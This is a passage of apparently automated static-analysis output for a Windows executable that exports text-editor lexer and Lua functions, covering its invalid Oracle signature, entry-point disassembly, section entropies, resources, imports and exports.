                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6328B684 [Mon Sep 19 18:35:48 2022 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:5
                                                                                        OS Version Minor:1
                                                                                        File Version Major:5
                                                                                        File Version Minor:1
                                                                                        Subsystem Version Major:5
                                                                                        Subsystem Version Minor:1
                                                                                        Import Hash:9f1eb76ab6beb10e56762f8019d97227
                                                                                        Signature Valid:false
                                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                        Error Number:-2146869232
                                                                                        Not Before, Not After
                                                                                        • 09/03/2023 00:00:00 11/03/2025 23:59:59
                                                                                        Subject Chain
                                                                                        • CN="Oracle America, Inc.", O="Oracle America, Inc.", L=Redwood City, S=California, C=US
                                                                                        Version:3
                                                                                        Thumbprint MD5:5F429788727974C52EF1B4CD93D03B8F
                                                                                        Thumbprint SHA-1:CD7BE0F00F2A5EE102C3037E098AF3F457D3B1AB
                                                                                        Thumbprint SHA-256:4B59D847D7187ED910590D52798FD7E6FCB13396092FDBC1FE43B2311AAB6EEB
                                                                                        Serial:060E2F8F9E1B8BE518D5FE2B69CFCCB1
                                                                                        Instruction
                                                                                        call 00007FB95CDFE0E4h
                                                                                        jmp 00007FB95CDFDA0Fh
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        push esi
                                                                                        push dword ptr [ebp+08h]
                                                                                        mov esi, ecx
                                                                                        call 00007FB95CC78581h
                                                                                        mov dword ptr [esi], 005ADAA4h
                                                                                        mov eax, esi
                                                                                        pop esi
                                                                                        pop ebp
                                                                                        retn 0004h
                                                                                        and dword ptr [ecx+04h], 00000000h
                                                                                        mov eax, ecx
                                                                                        and dword ptr [ecx+08h], 00000000h
                                                                                        mov dword ptr [ecx+04h], 005ADAACh
                                                                                        mov dword ptr [ecx], 005ADAA4h
                                                                                        ret
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        push esi
                                                                                        push dword ptr [ebp+08h]
                                                                                        mov esi, ecx
                                                                                        call 00007FB95CC7854Eh
                                                                                        mov dword ptr [esi], 005ADAC0h
                                                                                        mov eax, esi
                                                                                        pop esi
                                                                                        pop ebp
                                                                                        retn 0004h
                                                                                        and dword ptr [ecx+04h], 00000000h
                                                                                        mov eax, ecx
                                                                                        and dword ptr [ecx+08h], 00000000h
                                                                                        mov dword ptr [ecx+04h], 005ADAC8h
                                                                                        mov dword ptr [ecx], 005ADAC0h
                                                                                        ret
                                                                                        lea eax, dword ptr [ecx+04h]
                                                                                        mov dword ptr [ecx], 005ADA98h
                                                                                        push eax
                                                                                        call 00007FB95CDFE187h
                                                                                        pop ecx
                                                                                        ret
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        push esi
                                                                                        mov esi, ecx
                                                                                        lea eax, dword ptr [esi+04h]
                                                                                        mov dword ptr [esi], 005ADA98h
                                                                                        push eax
                                                                                        call 00007FB95CDFE170h
                                                                                        test byte ptr [ebp+08h], 00000001h
                                                                                        pop ecx
                                                                                        je 00007FB95CDFDB9Ch
                                                                                        push 0000000Ch
                                                                                        push esi
                                                                                        call 00007FB95CDFD276h
                                                                                        pop ecx
                                                                                        pop ecx
                                                                                        mov eax, esi
                                                                                        pop esi
                                                                                        pop ebp
                                                                                        retn 0004h
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        sub esp, 0Ch
                                                                                        lea ecx, dword ptr [ebp-0Ch]
                                                                                        call 00007FB95CDFDAFEh
                                                                                        push 005EE6BCh
                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                        push eax
                                                                                        call 00007FB95CDFE142h
                                                                                        Programming Language:
                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x1ee8700xe3c.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1ef6ac0x208.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2040000x2d957.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x297c000x2870.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2320000x11472.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x1de5400x70.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x1de6500x18.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1de5b00x40.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x1ad0000x8fc.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x1ab7650x1ab80035b3882fb84d2c3c2e9541127c9bb5b0False0.49125605354532165data6.625864824158646IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x1ad0000x45ed20x46000c620e9c1358dec994d346d5ec97f18f9False0.3361363002232143data5.559929453091573IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0x1f30000x100600xfc00ca7a852e7f3f4d04c757a15e362c6f8dFalse0.4250372023809524DOS executable (block device driver \277DN\346@\273)4.825556059166698IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc0x2040000x2d9570x2da00527da42bcbfcf4fd4d10a26f5e412f33False0.21568921232876712data5.092579347709825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x2320000x68a000x68a00b08cf37bce51a56e378a362ef413cc59False0.6475181078255675data7.538314299200359IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        PROPERTIES0x204b700x1c3daNon-ISO extended-ASCII text, with CRLF line terminatorsEnglishUnited States0.23243771288275672
                                                                                        RT_CURSOR0x220f4c0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                                                                                        RT_BITMAP0x2210800xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, resolution 2834 x 2834 px/m, 16 important colorsEnglishUnited States0.48660714285714285
                                                                                        RT_BITMAP0x2211600x328Device independent bitmap graphic, 16 x 16 x 24, image size 0EnglishUnited States0.18316831683168316
                                                                                        RT_BITMAP0x2214880x328Device independent bitmap graphic, 16 x 16 x 24, image size 0EnglishUnited States0.14603960396039603
                                                                                        RT_BITMAP0x2217b00x328Device independent bitmap graphic, 16 x 16 x 24, image size 0EnglishUnited States0.1349009900990099
                                                                                        RT_BITMAP0x221ad80x328Device independent bitmap graphic, 16 x 16 x 24, image size 0EnglishUnited States0.1745049504950495
                                                                                        RT_BITMAP0x221e000x328Device independent bitmap graphic, 16 x 16 x 24, image size 0EnglishUnited States0.32425742574257427
                                                                                        RT_BITMAP0x2221280x328Device independent bitmap graphic, 16 x 16 x 24, image size 0EnglishUnited States0.12128712871287128
                                                                                        RT_BITMAP0x2224500x188Device independent bitmap graphic, 24 x 24 x 4, image size 288, resolution 2834 x 2834 px/m, 16 important colorsEnglishUnited States0.3877551020408163
                                                                                        RT_BITMAP0x2225d80x4d8Device independent bitmap graphic, 20 x 20 x 24, image size 0EnglishUnited States0.12903225806451613
                                                                                        RT_BITMAP0x222ab00x4d8Device independent bitmap graphic, 20 x 20 x 24, image size 0EnglishUnited States0.1032258064516129
                                                                                        RT_BITMAP0x222f880x4d8Device independent bitmap graphic, 20 x 20 x 24, image size 0EnglishUnited States0.0935483870967742
                                                                                        RT_BITMAP0x2234600x4d8Device independent bitmap graphic, 20 x 20 x 24, image size 0EnglishUnited States0.13709677419354838
                                                                                        RT_BITMAP0x2239380x4d8Device independent bitmap graphic, 20 x 20 x 24, image size 0EnglishUnited States0.2403225806451613
                                                                                        RT_BITMAP0x223e100x4d8Device independent bitmap graphic, 20 x 20 x 24, image size 0EnglishUnited States0.10806451612903226
                                                                                        RT_BITMAP0x2242e80x6e8Device independent bitmap graphic, 24 x 24 x 24, image size 0EnglishUnited States0.10463800904977376
                                                                                        RT_BITMAP0x2249d00x6e8Device independent bitmap graphic, 24 x 24 x 24, image size 0EnglishUnited States0.08653846153846154
                                                                                        RT_BITMAP0x2250b80x6e8Device independent bitmap graphic, 24 x 24 x 24, image size 0EnglishUnited States0.08031674208144797
                                                                                        RT_BITMAP0x2257a00x6e8Device independent bitmap graphic, 24 x 24 x 24, image size 0EnglishUnited States0.10576923076923077
                                                                                        RT_BITMAP0x225e880x6e8Device independent bitmap graphic, 24 x 24 x 24, image size 0EnglishUnited States0.21153846153846154
                                                                                        RT_BITMAP0x2265700x6e8Device independent bitmap graphic, 24 x 24 x 24, image size 0EnglishUnited States0.08936651583710407
                                                                                        RT_BITMAP0x226c580xc28Device independent bitmap graphic, 32 x 32 x 24, image size 0EnglishUnited States0.07390745501285347
                                                                                        RT_BITMAP0x2278800xc28Device independent bitmap graphic, 32 x 32 x 24, image size 0EnglishUnited States0.08451156812339332
                                                                                        RT_BITMAP0x2284a80xc28Device independent bitmap graphic, 32 x 32 x 24, image size 0EnglishUnited States0.07133676092544987
                                                                                        RT_BITMAP0x2290d00xc28Device independent bitmap graphic, 32 x 32 x 24, image size 0EnglishUnited States0.09993573264781491
                                                                                        RT_BITMAP0x229cf80xc28Device independent bitmap graphic, 32 x 32 x 24, image size 0EnglishUnited States0.15167095115681234
                                                                                        RT_BITMAP0x22a9200xc28Device independent bitmap graphic, 32 x 32 x 24, image size 0EnglishUnited States0.052377892030848326
                                                                                        RT_ICON0x22b5480x128Device independent bitmap graphic, 16 x 32 x 4, image size 192, 16 important colorsEnglishUnited States0.6317567567567568
                                                                                        RT_ICON0x22b6700x568Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colorsEnglishUnited States0.5823699421965318
                                                                                        RT_ICON0x22bbd80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640, 16 important colorsEnglishUnited States0.5120967741935484
                                                                                        RT_ICON0x22bec00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.5455776173285198
                                                                                        RT_ICON0x22c7680x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.36341463414634145
                                                                                        RT_ICON0x22cdd00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.42350746268656714
                                                                                        RT_MENU0x22dc780x1330dataEnglishUnited States0.3373371335504886
                                                                                        RT_DIALOG0x22efa80xd8dataEnglishUnited States0.6481481481481481
                                                                                        RT_DIALOG0x22f0800x288dataEnglishUnited States0.4212962962962963
                                                                                        RT_DIALOG0x22f3080x29cdataEnglishUnited States0.4476047904191617
                                                                                        RT_DIALOG0x22f5a40x120dataEnglishUnited States0.5798611111111112
                                                                                        RT_DIALOG0x22f6c40x1f0dataEnglishUnited States0.4213709677419355
                                                                                        RT_DIALOG0x22f8b40x1c8dataEnglishUnited States0.4166666666666667
                                                                                        RT_DIALOG0x22fa7c0x1ccdataEnglishUnited States0.5130434782608696
                                                                                        RT_DIALOG0x22fc480x328dataEnglishUnited States0.4752475247524752
                                                                                        RT_DIALOG0x22ff700x3eedataEnglishUnited States0.4224652087475149
                                                                                        RT_DIALOG0x2303600x3a0dataEnglishUnited States0.4665948275862069
                                                                                        RT_DIALOG0x2307000x4aedataEnglishUnited States0.41569282136894825
                                                                                        RT_ACCELERATOR0x230bb00x2b0dataEnglishUnited States0.5537790697674418
                                                                                        RT_GROUP_CURSOR0x230e600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                        RT_GROUP_ICON0x230e740x5adataEnglishUnited States0.7333333333333333
                                                                                        RT_VERSION0x230ed00x354dataEnglishUnited States0.45892018779342725
                                                                                        RT_MANIFEST0x2312240x733XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4139989148128052
                                                                                        DLLImport
                                                                                        IMM32.dllImmSetCompositionFontW, ImmSetCompositionWindow, ImmGetContext, ImmEscapeW, ImmSetCompositionStringW, ImmSetCandidateWindow, ImmGetCompositionStringW, ImmReleaseContext, ImmNotifyIME
                                                                                        MSIMG32.dllAlphaBlend, TransparentBlt
                                                                                        COMCTL32.dllInitCommonControlsEx
                                                                                        UxTheme.dllDrawThemeBackground, GetThemeBackgroundContentRect, OpenThemeData, DrawThemeParentBackground, CloseThemeData, GetThemePartSize
                                                                                        KERNEL32.dllLockResource, GlobalFree, LoadResource, FindResourceW, PeekConsoleInputW, LocalFree, VerSetConditionMask, GetConsoleWindow, VerifyVersionInfoW, AllocConsole, GetExitCodeProcess, GetTimeFormatA, CreateFileW, FileTimeToSystemTime, GetDateFormatA, FileTimeToLocalFileTime, GetFileTime, GetLocaleInfoW, Beep, CreateMutexW, GetCurrentThreadId, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetModuleFileNameA, LoadLibraryExA, FormatMessageA, LoadLibraryA, GetCurrentProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, CreateEventW, WaitForSingleObjectEx, ResetEvent, SetEvent, InitializeCriticalSectionAndSpinCount, GetLastError, GetProcAddress, GetModuleHandleW, FreeLibrary, MulDiv, LoadLibraryExW, GetLocaleInfoA, Sleep, GlobalSize, GlobalAlloc, GlobalLock, LCMapStringW, WideCharToMultiByte, GetTickCount, GlobalUnlock, ReadFile, FindFirstFileW, SetHandleInformation, CompareStringW, GetFullPathNameW, FindNextFileW, CreatePipe, PeekNamedPipe, FindClose, WaitForSingleObject, GetFileAttributesExW, CloseHandle, CreateProcessW, LoadLibraryW, IsDBCSLeadByteEx, SizeofResource, GetCommandLineW, GetStdHandle, GetCPInfo, WriteFile, TerminateProcess, FormatMessageW, GetModuleFileNameW, GetTempPathW, GetFileAttributesW, FreeResource, SetCurrentDirectoryA, IsValidCodePage, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeSListHead, MultiByteToWideChar
                                                                                        USER32.dllSendMessageTimeoutW, GetThreadDesktop, EnumWindows, GetUserObjectInformationW, GetWindowTextLengthW, DrawFocusRect, GetClassNameW, DrawFrameControl, GetNextDlgTabItem, GetWindowTextW, CreateDialogParamW, EndDialog, IsDialogMessageW, SetDlgItemTextW, SendDlgItemMessageW, IsDlgButtonChecked, GetDlgItemInt, GetDlgItem, CheckDlgButton, DialogBoxParamW, EnableWindow, DeferWindowPos, OpenClipboard, GetParent, ReleaseCapture, InvalidateRect, ReleaseDC, GetCursorPos, BeginPaint, EndPaint, DrawTextW, GetClientRect, GetMenuState, ModifyMenuW, CheckMenuRadioItem, GetWindow, GetMenuItemCount, DeleteMenu, GetClassInfoW, BeginDeferWindowPos, SetMenuItemInfoW, GetTopWindow, DrawMenuBar, EndDeferWindowPos, InsertMenuW, CheckMenuItem, EnableMenuItem, GetMessageW, GetMenuItemInfoW, GetMenu, MessageBoxW, GetWindowPlacement, LoadAcceleratorsW, GetSubMenu, DispatchMessageW, VkKeyScanW, DestroyAcceleratorTable, PeekMessageW, SetWindowPlacement, WinHelpW, FlashWindow, TranslateAcceleratorW, TranslateMessage, LoadIconW, FindWindowW, AppendMenuW, PostQuitMessage, UpdateWindow, SetForegroundWindow, LoadImageW, IsIconic, GetFocus, SetWindowTextW, RegisterClassW, RegisterWindowMessageW, SetScrollInfo, RegisterClipboardFormatW, GetKeyState, GetUpdateRgn, PostMessageW, HideCaret, ScreenToClient, NotifyWinEvent, GetScrollInfo, MsgWaitForMultipleObjects, SetCaretPos, SystemParametersInfoW, SetTimer, GetDlgCtrlID, CloseClipboard, EmptyClipboard, IsChild, CreateCaret, ValidateRect, TrackMouseEvent, GetKeyboardLayout, GetMessageTime, SetFocus, GetClipboardData, DestroyCaret, SetClipboardData, AppendMenuA, IsClipboardFormatAvailable, GetCaretBlinkTime, ShowCaret, KillTimer, PtInRect, GetWindowLongW, DefWindowProcW, AdjustWindowRectEx, CallWindowProcW, MonitorFromPoint, GetWindowRect, DestroyWindow, InflateRect, GetDC, SetWindowPos, CopyImage, MonitorFromRect, MonitorFromWindow, FillRect, CreateWindowExW, GetIconInfo, SendMessageW, GetSystemMetrics, UnregisterClassW, CreatePopupMenu, RegisterClassExW, DestroyCursor, TrackPopupMenu, ShowWindow, DrawTextA, GetMonitorInfoW, CreateIconIndirect, ClientToScreen, MapWindowPoints, GetDoubleClickTime, FrameRect, GetSysColor, DestroyMenu, LoadCursorW, SetCapture, SetCursor, SetWindowLongW, SystemParametersInfoA
                                                                                        GDI32.dllTranslateCharsetInfo, EndPage, DPtoLP, CreateRectRgnIndirect, CreateRectRgn, CreateBitmap, CombineRgn, BitBlt, CreateCompatibleBitmap, ExtTextOutA, SelectObject, CreateDIBSection, GetTextExtentPoint32A, CreateCompatibleDC, GetTextExtentExPointW, StretchBlt, GetNearestColor, GetTextExtentExPointA, GetDeviceCaps, GetTextMetricsW, CreatePatternBrush, DeleteDC, GetTextExtentPoint32W, SetTextColor, SetBkMode, LineTo, CreatePen, Rectangle, GetObjectW, Polygon, MoveToEx, SetBkColor, Ellipse, DeleteObject, CreateSolidBrush, CreateFontIndirectW, SetTextAlign, RoundRect, ExtTextOutW, IntersectClipRect, EndDoc, StartPage, CreateFontA, GetDIBits, GetStockObject, StartDocW
                                                                                        COMDLG32.dllGetSaveFileNameW, CommDlgExtendedError, PageSetupDlgW, GetOpenFileNameW, PrintDlgW
                                                                                        ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegQueryValueExW
                                                                                        SHELL32.dllShell_NotifyIconW, SHGetPathFromIDListW, SHGetMalloc, DragAcceptFiles, ShellExecuteExW, DragFinish, SHBrowseForFolderW, DragQueryFileW
                                                                                        ole32.dllReleaseStgMedium, RevokeDragDrop, CoCreateInstance, CLSIDFromProgID, RegisterDragDrop, OleUninitialize, DoDragDrop, OleInitialize
                                                                                        OLEAUT32.dllSysFreeString, SysAllocString
                                                                                        MSVCP140.dll??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z, ?uncaught_exception@std@@YA_NXZ, ??0_Locinfo@std@@QAE@PBD@Z, ??1_Locinfo@std@@QAE@XZ, ??Bid@locale@std@@QAEIXZ, ?_Incref@facet@locale@std@@UAEXXZ, ?_Decref@facet@locale@std@@UAEPAV_Facet_base@3@XZ, ??0facet@locale@std@@IAE@I@Z, ??1facet@locale@std@@MAE@XZ, ?tolower@?$ctype@D@std@@QBEDD@Z, ?tolower@?$ctype@D@std@@QBEPBDPADPBD@Z, ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z, ?is@?$ctype@_W@std@@QBE_NF_W@Z, ?tolower@?$ctype@_W@std@@QBE_W_W@Z, ?tolower@?$ctype@_W@std@@QBEPB_WPA_WPB_W@Z, ?_Getcat@?$ctype@_W@std@@SAIPAPBVfacet@locale@2@PBV42@@Z, _Query_perf_counter, _Strcoll, _Wcsxfrm, ?id@?$collate@D@std@@2V0locale@2@A, ?id@?$collate@_W@std@@2V0locale@2@A, ?id@?$ctype@D@std@@2V0locale@2@A, ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@@Z, ?id@?$ctype@_W@std@@2V0locale@2@A, ?_Xbad_alloc@std@@YAXXZ, ?_Init@locale@std@@CAPAV_Locimp@12@_N@Z, ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ, ??0_Lockit@std@@QAE@H@Z, ??1_Lockit@std@@QAE@XZ, _Query_perf_frequency, _Wcscoll, _Strxfrm, ?__ExceptionPtrRethrow@@YAXPBX@Z, ?__ExceptionPtrDestroy@@YAXPAX@Z, ?__ExceptionPtrToBool@@YA_NPBX@Z, ?_XGetLastError@std@@YAXXZ, ?_Xout_of_range@std@@YAXPBD@Z, ?_Execute_once@std@@YAHAAUonce_flag@1@P6GHPAX1PAPAX@Z1@Z, ?__ExceptionPtrCopy@@YAXPAXPBX@Z, ?__ExceptionPtrCreate@@YAXPAX@Z, ?_Xlength_error@std@@YAXPBD@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ, ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ, ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JXZ, ?uflow@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEHXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z, ?setbuf@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEPAV12@PAD_J@Z, ?sync@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEHXZ, ?imbue@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEXABVlocale@2@@Z, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@F@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@H@Z, ?_Throw_C_error@std@@YAXH@Z, _Mtx_destroy_in_situ, _Mtx_lock, _Mtx_init_in_situ, _Mtx_unlock, _Cnd_signal, ?_Throw_Cpp_error@std@@YAXH@Z, _Cnd_do_broadcast_at_thread_exit, _Cnd_destroy, _Cnd_wait, _Mtx_init, _Thrd_start, _Thrd_detach, _Mtx_destroy, _Cnd_init, ?_Xinvalid_argument@std@@YAXPBD@Z, ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@N@Z, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z, ?_Getcoll@_Locinfo@std@@QBE?AU_Collvec@@XZ, ?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ
                                                                                        VCRUNTIME140.dllstrstr, strrchr, wcsrchr, longjmp, _CxxThrowException, __std_exception_copy, _except_handler4_common, __std_exception_destroy, _purecall, strchr, __std_terminate, __CxxFrameHandler3, __RTDynamicCast, _setjmp3, memchr, memcpy, memmove, memset
                                                                                        api-ms-win-crt-runtime-l1-1-0.dll_controlfp_s, strerror, _invalid_parameter_noinfo_noreturn, exit, _register_thread_local_exe_atexit_callback, _c_exit, _exit, _initterm_e, _initterm, _get_narrow_winmain_command_line, _set_app_type, terminate, abort, _seh_filter_exe, _cexit, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, system, _errno
                                                                                        api-ms-win-crt-math-l1-1-0.dll_CIacos, lround, roundf, __setusermatherr, _CIasin, _CIatan2, frexp, _CIcos, truncf, _CIfmod, _CIlog, _CIlog10, _CIpow, floor, _CIsin, _CIsqrt, lroundf, ldexp, _CItan, ceil, _CIexp
                                                                                        api-ms-win-crt-string-l1-1-0.dllstrpbrk, toupper, isgraph, strcoll, tolower, islower, strncmp, isspace, iscntrl, isalnum, isxdigit, strncpy, wcsncmp, ispunct, isalpha, strspn, isdigit, strnlen, isupper
                                                                                        api-ms-win-crt-stdio-l1-1-0.dlltmpnam, fgets, fwrite, fopen, __stdio_common_vfprintf, _wpopen, fclose, __stdio_common_vsprintf, _popen, fputc, getc, freopen, ferror, _fseeki64, __acrt_iob_func, _ftelli64, ungetc, setvbuf, tmpfile, _set_fmode, fflush, _pclose, _wfopen, clearerr, __p__commode, feof, fputs, ftell, fread, __stdio_common_vsscanf
                                                                                        api-ms-win-crt-convert-l1-1-0.dllatol, atoi, strtoll, strtod, atoll, strtol, strtof
                                                                                        api-ms-win-crt-heap-l1-1-0.dllfree, malloc, realloc, _callnewh, _set_new_mode
                                                                                        api-ms-win-crt-time-l1-1-0.dll_time64, _gmtime64, _difftime64, clock, _mktime64, _localtime64, strftime
                                                                                        api-ms-win-crt-filesystem-l1-1-0.dllremove, rename, _wchdir, _wunlink, _wstat64i32, _waccess
                                                                                        api-ms-win-crt-environment-l1-1-0.dll__p__environ, getenv, _wgetenv, _wgetcwd
                                                                                        api-ms-win-crt-locale-l1-1-0.dllsetlocale, localeconv, _configthreadlocale
                                                                                        api-ms-win-crt-utility-l1-1-0.dllsrand, rand
                                                                                        NameOrdinalAddress
                                                                                        _CreateLexer@410x402270
                                                                                        _GetLexerCount@020x4021c0
                                                                                        _GetLexerFactory@430x402250
                                                                                        _GetLexerName@1240x4021e0
                                                                                        luaL_addlstring50x57b4f0
                                                                                        luaL_addstring60x57b520
                                                                                        luaL_addvalue70x57b640
                                                                                        luaL_argerror80x57a850
                                                                                        luaL_buffinit90x57b770
                                                                                        luaL_buffinitsize100x57b7a0
                                                                                        luaL_callmeta110x57bfa0
                                                                                        luaL_checkany120x57afb0
                                                                                        luaL_checkinteger130x57b190
                                                                                        luaL_checklstring140x57afe0
                                                                                        luaL_checknumber150x57b080
                                                                                        luaL_checkoption160x57ae60
                                                                                        luaL_checkstack170x57af30
                                                                                        luaL_checktype180x57af70
                                                                                        luaL_checkudata190x57ae30
                                                                                        luaL_checkversion_200x57c900
                                                                                        luaL_error210x57aa50
                                                                                        luaL_execresult220x57ab30
                                                                                        luaL_fileresult230x57aa90
                                                                                        luaL_getmetafield240x57beb0
                                                                                        luaL_getsubtable250x57c420
                                                                                        luaL_gsub260x57c6a0
                                                                                        luaL_len270x57c030
                                                                                        luaL_loadbufferx280x57be30
                                                                                        luaL_loadfilex290x57bb90
                                                                                        luaL_loadstring300x57be70
                                                                                        luaL_newmetatable310x57ac20
                                                                                        luaL_newstate320x57c8e0
                                                                                        luaL_openlibs330x585ef0
                                                                                        luaL_optinteger340x57b1f0
                                                                                        luaL_optlstring350x57b010
                                                                                        luaL_optnumber360x57b0d0
                                                                                        luaL_prepbuffsize370x57b360
                                                                                        luaL_pushresult380x57b560
                                                                                        luaL_pushresultsize390x57b620
                                                                                        luaL_ref400x57b7d0
                                                                                        luaL_requiref410x57c500
                                                                                        luaL_setfuncs420x57c320
                                                                                        luaL_setmetatable430x57ad30
                                                                                        luaL_testudata440x57ad70
                                                                                        luaL_tolstring450x57c0b0
                                                                                        luaL_traceback460x57a500
                                                                                        luaL_unref470x57b910
                                                                                        luaL_where480x57a9d0
                                                                                        lua_absindex490x578180
                                                                                        lua_arith500x578510
                                                                                        lua_atpanic510x578140
                                                                                        lua_callk520x579630
                                                                                        lua_checkstack530x578050
                                                                                        lua_close540x593070
                                                                                        lua_compare550x578570
                                                                                        lua_concat560x579ce0
                                                                                        lua_copy570x5782f0
                                                                                        lua_createtable580x578f20
                                                                                        lua_dump590x5799a0
                                                                                        lua_error600x579ba0
                                                                                        lua_gc610x579a30
                                                                                        lua_getallocf620x579d70
                                                                                        lua_getfield630x578d40
                                                                                        lua_getglobal640x578c80
                                                                                        lua_gethook650x581c10
                                                                                        lua_gethookcount660x581c30
                                                                                        lua_gethookmask670x581c20
                                                                                        lua_geti680x578d70
                                                                                        lua_getinfo690x5822b0
                                                                                        lua_getlocal700x581d50
                                                                                        lua_getmetatable710x578f70
                                                                                        lua_getstack720x581c40
                                                                                        lua_gettable730x578cc0
                                                                                        lua_gettop740x5781b0
                                                                                        lua_getupvalue750x579e50
                                                                                        lua_getuservalue760x578fd0
                                                                                        lua_iscfunction770x5783e0
                                                                                        lua_isinteger780x578410
                                                                                        lua_isnumber790x578430
                                                                                        lua_isstring800x578470
                                                                                        lua_isuserdata810x5784a0
                                                                                        lua_isyieldable820x583a70
                                                                                        lua_len830x579d40
                                                                                        lua_load840x5797c0
                                                                                        lua_newstate850x592e20
                                                                                        lua_newthread860x592d00
                                                                                        lua_newuserdata870x579dc0
                                                                                        lua_next880x579bb0
                                                                                        lua_pcallk890x5796e0
                                                                                        lua_pushboolean900x578b70
